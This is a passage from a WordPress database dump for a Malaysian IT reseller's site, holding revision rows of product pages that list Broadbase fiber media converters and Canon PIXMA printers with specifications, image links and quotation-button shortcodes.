Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"10\" ]','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-21 16:15:28','2018-12-21 08:15:28','',1943,'https://bintara.com.my/blog/2018/12/21/1943-revision-v1/',0,'revision','',0),(2713,1,'2018-12-21 16:16:58','2018-12-21 08:16:58','[vfb id=8]','Get Quotation (Broadbase)','','inherit','closed','closed','','2703-autosave-v1','','','2018-12-21 16:16:58','2018-12-21 08:16:58','',2703,'https://bintara.com.my/blog/2018/12/21/2703-autosave-v1/',0,'revision','',0),(2718,1,'2018-12-21 17:30:35','2018-12-21 09:30:35','<h3>Printer :-</h3>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS9570</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank Wireless All-In-One with Fax for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, ScanÂ  Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-21 17:30:35','2018-12-21 09:30:35','',1449,'https://bintara.com.my/blog/2018/12/21/1449-revision-v1/',0,'revision','',0),(2716,1,'2018-12-21 16:44:12','2018-12-21 08:44:12','<h3>Printer :-</h3>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS9570</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank Wireless All-In-One with Fax for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, ScanÂ  Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p><h3>Printer :-</h3>\n<table>\n<tbody>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA E560 / E560R</strong>\nAdvanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\nThe Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\nAvailable in Black and Red.\nPrint, Scan, Copy\nISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour\nHi-speed USB 2.0, WiFi\nRecommended print volume: 80 - 400 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA E4270</strong>\nCompact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\nPrint, Scan, Copy, Fax\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\nRecommended print volume: 50 - 200 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA TS9570</strong>\nA3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\nPrint, Scan, Copy\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\nRecommended print volume: 80 - 300 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA TS8270</strong>\nWireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing\nThis advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.\nAvailable in Black, Red and White.\nPrint, Scan, Copy\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\nHi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct\nRecommended print volume: 30 - 100 pages\n[maxbutton id=\"1\" ]</td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMAÂ G2010</strong>\nRefillable Ink Tank All-In-One for High Volume Printing\nDesigned for high volume printing at low running cost\nPrint, Scan &amp; Copy\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\nHi-speed USB 2.0\nRecommended print volume: 150 - 1500 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA G4010</strong>\nRefillable Ink Tank Wireless All-In-One with Fax for High Volume Printing\nDesigned for high volume printing at low running cost.\nPrint, Scan, Copy and Fax\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode\nRecommended print volume: 150 - 1500 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA G1010</strong>\nRefillable Ink Tank Printer for High Volume Printing\nDesigned for high volume printing at low running cost\nPrint\nISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)\nPhoto Speed (4 x 6\"): 60sec. (borderless)\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-1.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA G3010</strong>\nRefillable Ink Tank Wireless All-In-One for High Volume Printing\nDesigned for high volume printing at low running cost\nPrint, ScanÂ  Copy\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\nHi-speed USB 2.0, WiFi, Mopria, Access Point Mode\nRecommended print volume: 150 - 1500 pages\n[maxbutton id=\"1\" ]</td>\n</tr>\n</tbody>\n</table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-21 16:44:12','2018-12-21 08:44:12','',1449,'https://bintara.com.my/blog/2018/12/21/1449-revision-v1/',0,'revision','',0),(2720,1,'2018-12-24 09:21:20','2018-12-24 01:21:20','<h3>Printer :-</h3>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p><br />ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p><br />Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p><br />Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-24 09:21:20','2018-12-24 01:21:20','',1449,'https://bintara.com.my/blog/2018/12/24/1449-revision-v1/',0,'revision','',0),(2723,1,'2018-12-24 09:33:03','2018-12-24 01:33:03','<h3>Injet Printers :-</h3>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>[maxbutton id=\"1\" 